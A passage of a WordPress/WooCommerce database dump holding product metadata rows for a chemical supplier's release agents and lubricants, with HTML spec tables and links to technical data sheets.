INSERT INTO `wp_postmeta` VALUES (3152, 440, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3153, 440, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3154, 440, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3155, 440, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3156, 440, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3157, 440, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3158, 440, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (3159, 440, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3160, 440, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3161, 440, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3162, 440, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3163, 440, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (3165, 440, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3194, 440, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3195, 440, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3196, 441, '_edit_lock', '1475593803:2'); 
INSERT INTO `wp_postmeta` VALUES (3197, 441, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (3198, 441, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3199, 441, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3200, 441, '312_default_editor', '<table width="1368">\r\n<tbody>\r\n<tr>\r\n<td width="208">Oil Grades</td>\r\n<td style="text-align: center;" width="145"><strong>100</strong></td>\r\n<td style="text-align: center;" width="145"><strong>101</strong></td>\r\n<td style="text-align: center;" width="145"><strong>102</strong></td>\r\n<td style="text-align: center;" width="145"><strong>103</strong></td>\r\n<td style="text-align: center;" width="145"><strong>104</strong></td>\r\n<td style="text-align: center;" width="145"><strong>105</strong></td>\r\n<td style="text-align: center;" width="145"><strong>106</strong></td>\r\n<td style="text-align: center;" width="145"><strong>107</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Oil Viscosity Index</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">29</td>\r\n<td style="text-align: center;">92</td>\r\n<td style="text-align: center;">111</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">145</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °F</td>\r\n<td style="text-align: center;">-94-150</td>\r\n<td style="text-align: center;">-94-220</td>\r\n<td style="text-align: center;">-81-270</td>\r\n<td style="text-align: center;">-76-310</td>\r\n<td style="text-align: center;">-60-355</td>\r\n<td style="text-align: center;">-33-400</td>\r\n<td style="text-align: center;">-33-500</td>\r\n<td style="text-align: center;">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3201, 441, '317_default_editor', '<table class=" aligncenter">\r\n<tbody>\r\n<tr>\r\n<td width="104"><strong>Syringe</strong></td>\r\n<td width="104"><strong>Dab-O-Matic</strong></td>\r\n<td width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td width="104"><strong>Jar</strong></td>\r\n<td width="104"><strong>Bottle</strong></td>\r\n<td width="104"><strong>Jug</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="104">.5 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">.5 kg</td>\r\n<td width="104">1 kg</td>\r\n<td width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">1 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104">20 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">2 oz.</td>\r\n<td width="104">-</td>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3202, 441, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3203, 441, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3204, 441, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3205, 441, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3206, 441, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3207, 441, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3208, 441, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3209, 441, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3210, 441, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3211, 441, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3212, 441, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3213, 441, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3214, 441, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3215, 441, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3216, 441, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3217, 441, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3218, 441, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3219, 441, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3220, 441, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3221, 441, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3222, 441, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3223, 441, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (3224, 441, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3225, 441, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3226, 441, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3227, 441, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3228, 441, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (3230, 441, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3259, 441, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3260, 441, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3261, 182, '_thumbnail_id', '16'); 
INSERT INTO `wp_postmeta` VALUES (3262, 442, '_edit_lock', '1475594015:2'); 
INSERT INTO `wp_postmeta` VALUES (3263, 442, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (3264, 442, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3265, 442, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3266, 442, '312_default_editor', '<table width="1368">\r\n<tbody>\r\n<tr>\r\n<td width="208">Oil Grades</td>\r\n<td style="text-align: center;" width="145"><strong>100</strong></td>\r\n<td style="text-align: center;" width="145"><strong>101</strong></td>\r\n<td style="text-align: center;" width="145"><strong>102</strong></td>\r\n<td style="text-align: center;" width="145"><strong>103</strong></td>\r\n<td style="text-align: center;" width="145"><strong>104</strong></td>\r\n<td style="text-align: center;" width="145"><strong>105</strong></td>\r\n<td style="text-align: center;" width="145"><strong>106</strong></td>\r\n<td style="text-align: center;" width="145"><strong>107</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Oil Viscosity Index</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">29</td>\r\n<td style="text-align: center;">92</td>\r\n<td style="text-align: center;">111</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">145</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °F</td>\r\n<td style="text-align: center;">-94-150</td>\r\n<td style="text-align: center;">-94-220</td>\r\n<td style="text-align: center;">-81-270</td>\r\n<td style="text-align: center;">-76-310</td>\r\n<td style="text-align: center;">-60-355</td>\r\n<td style="text-align: center;">-33-400</td>\r\n<td style="text-align: center;">-33-500</td>\r\n<td style="text-align: center;">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3267, 442, '317_default_editor', '<table class=" aligncenter">\r\n<tbody>\r\n<tr>\r\n<td width="104"><strong>Syringe</strong></td>\r\n<td width="104"><strong>Dab-O-Matic</strong></td>\r\n<td width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td width="104"><strong>Jar</strong></td>\r\n<td width="104"><strong>Bottle</strong></td>\r\n<td width="104"><strong>Jug</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="104">.5 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">.5 kg</td>\r\n<td width="104">1 kg</td>\r\n<td width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">1 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104">20 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">2 oz.</td>\r\n<td width="104">-</td>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3268, 442, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3269, 442, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3270, 442, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3271, 442, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3272, 442, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3273, 442, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3274, 442, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3275, 442, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3276, 442, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3277, 442, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3278, 442, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3279, 442, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3280, 442, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3281, 442, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3282, 442, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3283, 442, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3284, 442, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3285, 442, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3286, 442, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3287, 442, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3288, 442, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3289, 442, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (3290, 442, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3291, 442, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3292, 442, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3293, 442, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3294, 442, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (3296, 442, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3325, 442, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3326, 442, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3333, 442, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (3334, 182, '312_default_editor', '<strong>Physical Properties</strong>:\r\n<table style="height: 60px;" width="467">\r\n<tbody>\r\n<tr>\r\n<td width="123">Primary Polymer:</td>\r\n<td width="211">Fluoropolymer</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Appearance:</td>\r\n<td width="211">Light Yellow particle suspension</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Odor:</td>\r\n<td width="211">Alcohol</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Specific Gravity:</td>\r\n<td width="211">1.2 g/mL @ 25°C</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (3335, 182, '317_default_editor', '1- Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (3336, 182, '318_custom_list_file', 'a:1:{s:32:"7a983f6492ac582c78fb409433a8bdea";a:3:{s:4:"name";s:8:"MS-122AV";s:4:"file";s:70:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/122AV.pdf";s:4:"desc";s:12:"MS-122AV TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (3337, 182, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3338, 182, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3339, 182, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (3340, 182, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (3341, 182, '_ywtm_content_tab_description', '<strong>Physical Properties</strong>:\r\nPrimary Polymer:…...Fluoropolymer\r\nAppearance:…..........Light Yellow particle suspension\r\nOdor:.....................Alcohol\r\nSpecific Gravity:........1.2 g/mL @ 25°C\r\n\r\n<strong>Release Agent Applications:</strong>\r\n\r\nOur specialized chemistry can be used to release the following materials:\r\n<table style="height: 112px;" width="673">\r\n<tbody>\r\n<tr>\r\n<td width="140">•          Plastics</td>\r\n<td width="168">•          Rubbers</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Resins</td>\r\n<td width="168">•          Phenolics</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Acrylics</td>\r\n<td width="168">•          Polycarbonates</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Urethanes</td>\r\n<td width="168">•          Polystyrene</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Nylons</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (3342, 182, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3343, 182, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3344, 182, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3345, 182, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3346, 305, '312_default_editor', '<strong>Release Agent Application:</strong>\r\n\r\nMS-143AX can be used as a release agent to mold plastics, rubbers, resins, acrylics, epoxies, urethanes, nylons, phenolics, polycarbonates, polystyrene, and elastomers.  Air dried coatings typically provide 8 to 10 releases between applications.  When the coating is fused 25 or more releases are typical.  The transfer of PTFE to molded parts is negligible, minimizing interference with post finishing operations.'); 
INSERT INTO `wp_postmeta` VALUES (3347, 305, '317_default_editor', 'Quart, One Gallon, 5 Gallon, and 55 Gallon Drum'); 
INSERT INTO `wp_postmeta` VALUES (3348, 305, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3349, 305, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3350, 305, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (3351, 305, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (3352, 305, '_ywtm_content_tab_description', '<strong>Release Agent Application:</strong>\r\n\r\nMS-143AX can be used as a release agent to mold plastics, rubbers, resins, acrylics, epoxies, urethanes, nylons, phenolics, polycarbonates, polystyrene, and elastomers.  Air dried coatings typically provide 8 to 10 releases between applications.  When the coating is fused 25 or more releases are typical.  The transfer of PTFE to molded parts is negligible, minimizing interference with post finishing operations.'); 
INSERT INTO `wp_postmeta` VALUES (3353, 305, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3354, 305, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3355, 305, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3356, 305, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3357, 303, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table style="height: 5px;" width="596">\r\n<tbody>\r\n<tr>\r\n<td width="123">Primary Polymer:</td>\r\n<td width="171">Fluoropolymer</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Appearance:</td>\r\n<td width="171">White particle suspension</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Odor:</td>\r\n<td width="171">Slight</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Specific Gravity:</td>\r\n<td width="171">1.31 g/mL @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Ozone Depletion:</td>\r\n<td width="171">0.00</td>\r\n</tr>\r\n<tr>\r\n<td width="123">VOC</td>\r\n<td width="171">510 g/mL</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (3358, 303, '317_default_editor', 'Quart, One Gallon, 5 Gallon, and 55 Gallon Drum'); 
INSERT INTO `wp_postmeta` VALUES (3359, 303, '318_custom_list_file', 'a:1:{s:32:"6abcca0c620109062083d1bba536759f";a:3:{s:4:"name";s:8:"MS-143TE";s:4:"file";s:70:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/143TE.pdf";s:4:"desc";s:12:"MS-143TE-TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (3360, 303, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3361, 303, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3362, 303, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (3363, 303, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (3364, 303, '_ywtm_content_tab_description', '<strong>Physical Properties:</strong>\r\n\r\nPrimary Polymer:…Fluoropolymer\r\nAppearance:………White Particle suspension\r\nOdor:……………….Slight\r\nSpecific Gravity:…..1.31 g/mL @ 25°C\r\nOzone depletion:.....0.00\r\nVOC content……….510 g/mL\r\n\r\n&nbsp;\r\n\r\n<strong>Release Agent Applications</strong>\r\n\r\nMS-143TE formulation chemistry can be used to release the following materials and comes in concentrations ranging from 1-10 % PTFE:\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width="140">•          Plastics</td>\r\n<td width="168">•          Rubbers</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Resins</td>\r\n<td width="168">•          Phenolics</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Acrylics</td>\r\n<td width="168">•          Polycarbonates</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Urethanes</td>\r\n<td width="168">•          Polystyrene</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Nylons</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (3365, 303, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3366, 303, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3367, 303, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3368, 303, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3369, 452, '_edit_lock', '1477511529:2'); 
INSERT INTO `wp_postmeta` VALUES (3370, 452, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (3372, 218, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:800;s:6:"height";i:400;s:4:"file";s:14:"miller-1-1.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:22:"miller-1-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:22:"miller-1-1-800x400.jpg";s:5:"width";i:800;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:22:"miller-1-1-768x384.jpg";s:5:"width";i:768;s:6:"height";i:384;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:22:"miller-1-1-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:22:"miller-1-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:22:"miller-1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (3373, 455, '_edit_lock', '1484675197:2'); 
INSERT INTO `wp_postmeta` VALUES (3374, 455, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (3375, 455, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (3376, 456, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (3377, 456, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (3378, 456, '_menu_item_object_id', '455'); 
INSERT INTO `wp_postmeta` VALUES (3379, 456, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (3380, 456, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (3381, 456, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (3382, 456, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (3383, 456, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (3384, 466, '_wp_attached_file', '2016/08/TDS-143XD-new-format.pdf'); 
INSERT INTO `wp_postmeta` VALUES (3385, 306, '318_custom_list_file', 'a:1:{s:32:"249e1a0d7f65595a789f4810a5d48fab";a:3:{s:4:"name";s:8:"MS-143XD";s:4:"file";s:85:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/TDS-143XD-new-format.pdf";s:4:"desc";s:12:"MS-143XD TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (3386, 419, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (3387, 467, '_edit_lock', '1474652645:3'); 
INSERT INTO `wp_postmeta` VALUES (3388, 467, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (3390, 467, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3391, 467, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3392, 467, '312_default_editor', 'ShieldSys is offered as both a Compounding oil and Masterbatch concentrate.\r\n<ul>\r\n 	<li>ShieldSys compounding oil or Masterbatch can be incorporated into the polymer matrix via conventional melt compounding equipment. High shear mixing is recommended to ensure proper dispersion of the ShieldSys compound oil. The higher viscosity grades can be processed at temperatures as high as 680 F. The recommended loading of ShieldSys is 0.25% -<wbr /> 1.0% depending on the base polymer matrix and performance desired.</li>\r\n 	<li>Applicable for use with: TPU, Pebax, EVA, PA11, HDPE, PP, PMMA, Polyester, PVC, PVDF, ABS, PEEK, and Nylon-6.</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (3393, 467, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (3394, 467, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3395, 467, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3396, 467, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3397, 467, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3398, 467, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3399, 467, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3400, 467, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3401, 467, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3402, 467, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3403, 467, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3404, 467, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3405, 467, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3406, 467, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3407, 467, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3408, 467, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3409, 467, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3410, 467, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3411, 467, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3412, 467, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3413, 467, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3414, 467, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3415, 467, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3416, 467, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3417, 467, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (3418, 467, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3419, 467, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3420, 467, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3421, 467, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3422, 467, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (3423, 436, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (3424, 468, '_edit_lock', '1484686917:2'); 
INSERT INTO `wp_postmeta` VALUES (3425, 468, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (3427, 468, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3428, 468, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3429, 468, '312_default_editor', '<p class="Body"><strong><span class="C-12">Usage Recommendations</span></strong></p>\r\n<p class="Body"><span class="C-15">TriboSys has a dynamic range of medical applications. Prior to use of TriboSys all previous lubricants must be removed as failing to do so will limit the effectiveness and associated benefits of TriboSys Miller-<wbr />Stephenson recommends using <span class="C-8">SolvSys MS-<wbr />255DA, our Surface PrepClean™</span>  to prepare your device.</span></p>'); 
